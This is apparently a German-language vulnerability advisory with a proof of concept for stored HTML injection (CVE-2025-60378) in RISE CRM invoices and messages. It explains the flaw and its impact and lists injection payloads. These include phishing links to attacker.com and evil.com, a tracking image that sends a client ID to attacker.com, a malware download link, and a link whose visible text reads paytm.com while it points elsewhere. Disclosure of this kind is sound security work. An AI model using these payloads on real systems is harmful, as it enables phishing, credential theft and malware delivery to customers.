
Proof of Concept für gespeicherte HTML-Injektion in RISE CRM, das zeigt, wie authentifizierte Benutzer bösartiges HTML in Rechnungen und Nachrichten injizieren können, was zu Phishing und Malware-Verteilung über automatisierte E-Mails und PDFs führt.
⚠️ Sicherheitshinweis
Eine kritische Schwachstelle für gespeicherte HTML-Injection, die Rechnungen, Nachrichten und automatisierte Kommunikation betrifft
Eine kritische Schwachstelle für gespeicherte HTML-Injection wurde in RISE Ultimate Project Manager & CRM entdeckt, die es authentifizierten Benutzern ermöglicht, bösartiges HTML in Rechnungspositionen, Kundennotizen und Nachrichtenmodule einzuschleusen. Dieser injizierte Inhalt wird in der Datenbank gespeichert und automatisch in kundenorientierten E-Mails, PDFs und Chat-Kommunikation gerendert, was groß angelegte Phishing-Angriffe, Business-E-Mail-Kompromittierung und die Verbreitung von Malware über E-Mail/PDF ermöglicht.
| Attribut | Wert |
|---|---|
| CVE-ID | CVE-2025-60378 |
| Typ | Gespeicherte HTML-Injection |
| CWE | CWE-79 |
| Angriffsvektor | Netzwerk/Remote |
| Authentifizierung | Erforderlich (niedrige Berechtigungen) |
| Benutzerinteraktion | Keine |
| Schweregrad | HOCH |
| CVSS v3.1 | 8.1 - Hoch |
| Entdecker | Ajansha Shankar |
RISE CRM bereinigt und kodiert HTML-Inhalte in mehreren benutzerbearbeitbaren Feldern, einschließlich Rechnungen, Nachrichten und Kundennotizen, nicht ordnungsgemäß. Wenn authentifizierte Benutzer HTML-Payloads in diese Felder einschleusen, wird der Inhalt ohne ausreichende Filterung in der Datenbank gespeichert. Anschließend wird dieses bösartige HTML automatisch in kundenorientierten E-Mails, PDF-Anhängen und Nachrichten-/Chat-Modulen ohne ordnungsgemäßes Escaping gerendert. Wiederkehrende Rechnungen und automatisierte Nachrichten verstärken den Angriff, indem sie bösartige Inhalte gleichzeitig an mehrere Empfänger verteilen.
| Faktor | Auswirkung | Erklärung |
|---|---|---|
| Vertraulichkeit | 🔴 HOCH | Kundenanmeldedaten und sensible Daten können über Phishing erbeutet werden |
| Integrität | 🔴 HOCH | Bösartige Inhalte können die Wahrnehmung von Kommunikation und Geschäftsbeziehungen verändern |
| Verfügbarkeit | 🟡 NIEDRIG | Begrenzte direkte Auswirkung auf die Systemverfügbarkeit |
Ein Angreifer mit Projektmanager-Zugriff mit niedrigen Berechtigungen erstellt eine Rechnung mit bösartigem HTML:
<a href="https://attacker.com/fake-payment">Click here to view payment status</a>
Die Rechnung wird über automatisierte E-Mail an 100+ Kunden gesendet. Alle Kunden erhalten eine scheinbar legitime Rechnung, die sie auf eine Phishing-Website führt. Der Angreifer erbeutet gleichzeitig Anmeldedaten von mehreren Opfern.
Ein Angreifer schleust bösartiges HTML in eine Kundennachricht ein:
<img src="https://attacker.com/track.gif?user=CLIENT_ID">
<a href="https://malware.com">Download Updated Project Files</a>
Alle Teammitglieder und Kunden erhalten die Nachricht in ihrem Chat und klicken auf Links, um Malware herunterzuladen.
Ein Angreifer richtet eine wiederkehrende Rechnung mit einer Malware-Zustellungs-Payload ein. Jeden Monat erhalten Kunden automatisch Rechnungen mit eingebetteten bösartigen Inhalten, was einen persistenten Angriffsvektor darstellt.
Navigieren zu: RISE CRM Dashboard → Rechnungen/Nachrichten → Neu erstellen
<a href="https://attacker.com">Click here to view invoice</a>
<a href="https://evil.com" target="_blank">
<img src="https://media1.giphy.com/media/v1.Y2lkPTc5MGI3NjExbzg4OXRuZHd4MXF0bWNqa3BvN2pzbWdqMzRxZHc5bHJpbXpucHNtaSZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/9PgvV8ale90lQwfQTZ/giphy.gif">
</a>
<h1><font color=red>Visit Our New WebSite</font></h1>
<h3><mark><a href="https://evil.com">https://www.paytm.com/</a></mark></h3>
✅ Injiziertes HTML wird in E-Mails, PDFs und Nachrichten ohne Escaping gerendert ✅ Links sind klickbar und leiten auf Angreifer-Websites weiter ✅ Bilder werden von vom Angreifer kontrollierten Servern geladen ✅ Inhalte bleiben über alle zukünftigen Kundenkommunikationen hinweg bestehen ✅ Wiederkehrende Verteilung erreicht automatisch mehrere Empfänger